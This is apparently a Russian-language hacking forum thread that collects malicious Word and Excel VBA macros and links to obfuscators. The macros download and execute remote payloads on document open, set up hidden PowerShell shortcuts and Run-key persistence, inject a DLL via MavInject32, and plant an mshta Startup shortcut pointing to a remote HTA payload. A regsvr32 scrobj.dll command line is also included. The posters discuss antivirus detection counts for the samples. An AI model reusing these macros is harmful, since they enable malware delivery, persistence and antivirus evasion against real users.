Microsoft Word макрос (obfuscator)

[Johny]

​

 ​

vba-obfuscator также смотрите VBad​

 

[Johny]

https://www.youtube.com/watch?time_continue=313&v=O9apJ9dNf04​

Sub AutoOpen()
 
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://the.earth.li/~sgtatham/putty/0.68/w64/putty.exe", False
xHttp.Send
 
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile "putty.exe", 2 '//overwrite
End With
 
Shell ("putty.exe")
 
End Sub

 

[Johny]

https://youtu.be/DJr3NrBRo7c​

Private Sub Workbook_activate()
Dim shp As Shape
 
For Each shp In ActiveSheet.Shapes
   shp.Delete
Next shp
 
End Sub
 
 
Private Sub Workbook_Deactivate()
 
   Set oWsh = CreateObject("WScript.Shell")                               ' preparing WScript.Shell to use it to create a shorcut.
   
   sShortcut = oWsh.SpecialFolders("Desktop") + "\My Shortcut Name.lnk"   ' our shortcut directory must be in desktop.
   
   Set oShortcut = oWsh.CreateShortcut(sShortcut)                         'creating the shorcut.
   With oShortcut
    .TargetPath = "Powershell.exe"                                      ' the short cut target will be Powershell.
 
    .Arguments = "ضع البور شل اتاك" 'My Powershell attack.
    .Hotkey = "Ctrl+o" ' adding a hotkey to use to execute the attack.
    .WindowStyle = 7   ' Window style hidden
      .Save            ' save
     
   End With
   Set joy = CreateObject("scripting.filesystemobject")  ' preparing to use scripting.filesystemobject.
 
Application.SendKeys "^{o}"                              ' executing the attack.
Application.Wait (Now + TimeValue("0:00:2"))
joy.MoveFile Source:=sShortcut, Destination:=Environ("AppData") + "\" ' using scripting.filesystemobject we will move the shortcut from Desktop after executing it to %appdata%.
oWsh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Hackitup", Environ("AppData") + "\My Shortcut Name.lnk" ' adding to startup using registry.
 
End Sub

источник;dev-point.com​

 

[Johny]

https://www.youtube.com/watch?v=pLAdBRfnRbQ​

 ​

p.s источник тыц​

 ​

https://www.youtube.com/watch?v=pLAdBRfnRbQ​

'CODED BY Hackitup

Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long ' Declare the API needed to get the process ID
Private Declare Function WinExec Lib "kernel32.dll" ( _
     ByVal lpCmdLine As String, _
     ByVal nCmdShow As Long) As Long ' WinExecu to run command


Private Sub Workbook_activate()


Worksheets("sheet1").OLEObjects.Item(1).Copy  ' copying the dll from the sheet to clipboard.

 CreateObject("Shell.Application") _
 .Namespace(ActiveWorkbook.Path) _
 .Self.InvokeVerb "Paste"  ' pasting the copied file to disk (in the same path of the Excel book, you can change it to any file u desire.)
 
Application.Wait (Now + TimeValue("0:00:2"))
ID = CStr(GetCurrentProcessId) ' get the process ID as string


Application.Wait (Now + TimeValue("0:00:2"))


WinExec "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" + Space(1) + ID + Space(1) + "/INJECTRUNNING" + Space(1) + """" + ActiveWorkbook.Path + "\hello-world.dll" + """", 1 ' execute the injection using MavInject32.exe utility
End Sub

p.s источник тыц​

 

[Johny]

​

 ​

Simple Macro​

 

[Johny]

​

Sub AutoOpen()
Application.ScreenUpdating = False
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "%%URL%%", False
xHttp.Send
Dim j As String
j = Environ("AppDATA")
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile j & "\System.exe", 2 '//overwrite
End With
Shell (j & "\System.exe")
Application.ScreenUpdating = True
End Sub

​

 ​

p.s толкование тут тыц   ​

 

[Johny]

http://www.securitysift.com/wp-content/uploads/2015/02/macro1.png​

 ​

Detected by   ​

 

[Johny]

Всем привет это тупо пример но для паблика три детекта нормально тыц 

 ​

 ​

 

[Johny]

​

 ​

VBA Obfuscator​

 

[Johny]

​

 

[Johny]

​

 ​

 ​

команды сами ставим любые vba.txt​

       C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\windows\system32\cmd.exe /c regsvr32 /u /n /s /i:http://127.0.0.1/server.sct scrobj.dll

 

[Johny]

\..\..\..\windows\system32\cmd.exe /c regsvr32 /u /n /s /i:http://127.0.0.1/server.sct scrobj.dll

Что здесь подменяется на наш исполняемый файл? http://127.0.0.1/server.sct ?

И что такое scrobj.dll ?

Просто смущают расширения

нет вот скачиваешь тыц в нем ставишь свою ссылку у же,сам .server.sct также заливаешь на хостинг и ставишь в команду выше 

 по части .dll  вообще не понял возьми да за гугли или у себя на компе найди.

 

[Johny]

​

 

[Johny]

​

 

[Johny]

​

 ​

тыц и тыц​

 

[Johny]

​

 ​

Offensive VBA и тыц 

 ​

 

[Johny]

​

 

[Johny]

VBA macro to download and write HelloWorldMsgBox.exe as binary
Sub run()
remotefile = "http://<your ip>/HelloWorldMsgBox.exe"
Set HTTPReq = CreateObject("Microsoft.XMLHTTP")
HTTPReq.Open "GET", remotefile, False
HTTPReq.send

Set objFSTRM = CreateObject("SAPI.SpFileStream.1")
Call objFSTRM.Open("C:\\Users\\<target user>\\Desktop\\test.exe", 3, False)
Call objFSTRM.Write("Mom's spaghetti")
Call objFSTRM.Close

Set objFSTRM = CreateObject("SAPI.SpFileStream.1")
Call objFSTRM.Open("C:\\Users\\<target user>\\Desktop\\test.exe", 1, False)
Call objFSTRM.Seek(0, 0)
Call objFSTRM.Write(HTTPReq.responseBody)
Call objFSTRM.Close
End Sub
VBA-Alternative детект тыц 

 

 

[Johny]

​

 

[Johny]

На детект не смотрел, делал через это тыц 

 

Private Sub Document_Open()
    Set wshell = CreateObject("WScript.Shell")
    
    Dim path
    path = wshell.SpecialFolders("Startup") & "\Xrahitel.lnk"
    
    Set shortcut = wshell.CreateShortcut(path)
    
    shortcut.Arguments = "https://diskcitylink.pro/aeZMNlW/Payload.hta"
    shortcut.TargetPath = "mshta.exe"
    shortcut.WorkingDirectory = "%currentdir%"
    shortcut.WindowStyle = 1
    shortcut.IconLocation = "ПУТЬ_К_ИКОНКЕ"
    shortcut.Description = "Описание ярлыка"
    
    shortcut.Save
   
    ' ... ваш код ...

End Sub